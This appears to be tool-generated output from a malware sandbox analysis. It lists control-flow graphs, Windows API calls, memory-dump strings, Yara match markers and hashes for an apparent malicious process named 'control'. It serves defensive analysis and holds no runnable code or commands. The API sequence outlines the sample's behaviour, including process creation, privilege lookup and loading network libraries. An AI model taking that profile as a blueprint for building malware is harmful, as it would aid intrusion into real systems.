                                  • Instruction Fuzzy Hash: 513161B2900645ABC714DF64C889F67F7B9BB88B05F10851DF62A5B245DA30A650CBA8

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 425 2549076-25490c2 call 254bd40 428 254919c-25491a2 425->428 429 25490c8-2549118 call 254be10 call 253acf0 call 2544e50 425->429 436 2549120-2549131 Sleep 429->436 437 2549196-254919a 436->437 438 2549133-2549139 436->438 437->428 437->436 439 2549163-2549183 438->439 440 254913b-2549161 call 2548ca0 438->440 441 2549189-254918c 439->441 442 2549184 call 2548eb0 439->442 440->441 441->437 442->441
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02549128
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 3303cf2d7ae34a60da9932287dbf4d8a4abee8dad8b5115c484271d44e3ec96c
                                  • Instruction ID: d8822eee1f09eb01dd9137896b8da0a57941f673f82399d491f7486f14a1d88a
                                  • Opcode Fuzzy Hash: 3303cf2d7ae34a60da9932287dbf4d8a4abee8dad8b5115c484271d44e3ec96c
                                  • Instruction Fuzzy Hash: 6F21A2B1940345ABC714DF64CC85B67F7B5FB88B08F10801DE62D5B245DB70A550CBA9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 554 254a662-254a684 555 254a68c-254a6a1 RtlFreeHeap 554->555 556 254a687 call 254af60 554->556 556->555
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02533AF8), ref: 0254A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 3b169a03a4d6d4869557df61860f443006a029f9ed7622e83cbd9cf270615e2b
                                  • Instruction ID: f069c804ad5f1e4bcf09883f91f73fdc77a774ab61ab39d0d266af85331d95ab
                                  • Opcode Fuzzy Hash: 3b169a03a4d6d4869557df61860f443006a029f9ed7622e83cbd9cf270615e2b
                                  • Instruction Fuzzy Hash: 7AE068B91042860FD700EE79D4A049F37D4FFC0318720865AEC584B307D020C40B8761

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 557 254a670-254a6a1 call 254af60 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02533AF8), ref: 0254A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 047bfc3392c754dbd357d0a1b7ccf774e198d525e2411cf163488d5f94b3cc1c
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 29E04FB52002087BD714DF59CC44EA777ADEF88754F118554FD0857241C630F910CAF0

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0253836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0253838B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                  • Instruction ID: ae5aa46553025769aafdfa86363c75d9cd359e0c80bd35321bd279d343de95b6
                                  • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                  • Instruction Fuzzy Hash: F501A731A8122977E722AA94DC42FBEB76D6B80F55F040115FF04BA1C1EAA4690547FA
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0253AD62
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: 31582f238beb3c30e6d8c6c3ed8ca2daf2457efbbeb5facba34395b0f46edc5d
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: 5A011EB5E0020EABDF10DAE4DC45F9DB779AB54308F004595E90897241FA31E7148B95
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0254A734
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: b44ede6e5228d230972ba77778aa03fad5a9c89fc5fd37a7419543288c51121e
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 9401B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0253F1D2,0253F1D2,?,00000000,?,?), ref: 0254A800
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: a74d6b44c497589037dee59f5b64dfe1477963b6447a0ab723df86f9e3b050e7
                                  • Instruction ID: 3d3505c4750e43510b0ab6149032d0eeed218ccb193261a17e21a2651ee06f39
                                  • Opcode Fuzzy Hash: a74d6b44c497589037dee59f5b64dfe1477963b6447a0ab723df86f9e3b050e7
                                  • Instruction Fuzzy Hash: 24F049B62401197FDB14DFA9DC84EEB77A9EFC8254F108619F90CD7285C631E9118BB4
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0253F050,?,?,00000000), ref: 025491EC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                  • Instruction ID: 0f61685776051b3b7233ea33a3f2be15ef935ed370e6ba8aad4e05521ba1a20f
                                  • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                  • Instruction Fuzzy Hash: 28E06D373802043AE3206599AC02FA7B29DDBC1B24F150026FA0DEA2C0D995F40146A9
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02544536,?,02544CAF,02544CAF,?,02544536,?,?,?,?,?,00000000,00000000,?), ref: 0254A65D
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: eb1ea3ffa83968c240aa6f5fed797ff9b63ad37103f26a25052ecf8c39f7c003
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: C4E012B6200208ABDB14EF99CC40EA777ADEF88654F118558BE085B241CA30F9118AB0
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0253F1D2,0253F1D2,?,00000000,?,?), ref: 0254A800
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: a9f22c8a3e3eea659b6cfb6cfba540d094ae355c4775d97d6a2e19bfd2f44805
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: FDE01AB52002086BDB10DF49CC84EE777ADEF88654F118154BE0857241C930E8118BF5
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02538D14,?), ref: 0253F6FB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                  • Instruction ID: eb5ddeccca0ecb7c6075cdbb0e51adec8929c833ea89900dea27b8c839e71d10
                                  • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                  • Instruction Fuzzy Hash: 51D05E716903093AE610AAA49C02F2672896B44A44F490064F948962C3DD60E0004569
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                  • Instruction ID: b66740453366ca3e759c1fb0cc31d147f02d40d7cbd707ac5daf6f805d97e07f
                                  • Opcode Fuzzy Hash: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                  • Instruction Fuzzy Hash: 2EB09B75D015D5C5FB21F760460871779106BD0705F16C075D2130661F4738D1D5E176
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                  • Instruction ID: a9e1b6db54377f8e114c12f28d3553769ba0f37f43eb4a774763de6adeedd683
                                  • Opcode Fuzzy Hash: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                  • Instruction Fuzzy Hash: 6A51E5B1A00645AFDF30DF9CC89097EB7F8EB44205B448E99E496D7641E6B4FA40CBA0
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 047F4787
                                  • ExecuteOptions, xrefs: 047F46A0
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047F4725
                                  • Execute=1, xrefs: 047F4713
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047F46FC
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047F4742
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047F4655
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                  • Instruction ID: 1faa7dc06a3b1457147da765b91097207067f9ca0391dc197d7a0ce1540231f9
                                  • Opcode Fuzzy Hash: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                  • Instruction Fuzzy Hash: 63510B716002196BEF24AA68DC99FEE73BCEF54308F040499DA45A7390E770BE458F90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 946d71d189b134fbc13543dfbda6b3efaffd1bf6d540ab27cfc8df5cdd665ebb
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 5481C070E452499EDF24CE68E8927FEBBB5AF45320F18451EF861A73D1D734B8408B50
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 047F031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047F02BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047F02E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                  • Instruction ID: e368b0573ea45718023722d121d015cb1fff70f7ab54bf665ba4dbad640b96d0
                                  • Opcode Fuzzy Hash: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                  • Instruction Fuzzy Hash: 4DE1AC706087419FE725CF28C884B2AB7E1AF88324F144B6DE5A58B3E1E774F855CB52
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047F728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047F7294
                                  • RTL: Re-Waiting, xrefs: 047F72C1
                                  • RTL: Resource at %p, xrefs: 047F72A3
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                  • Instruction ID: 2c8fa0b5586e83afc21070c55a55024793a22bb49c87595ddab77bdf5b28dd24
                                  • Opcode Fuzzy Hash: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                  • Instruction Fuzzy Hash: 9041EF31701202AFE724DE65CD41BAAB7A5FB84714F104A19FE95EB780DB60F8429BD2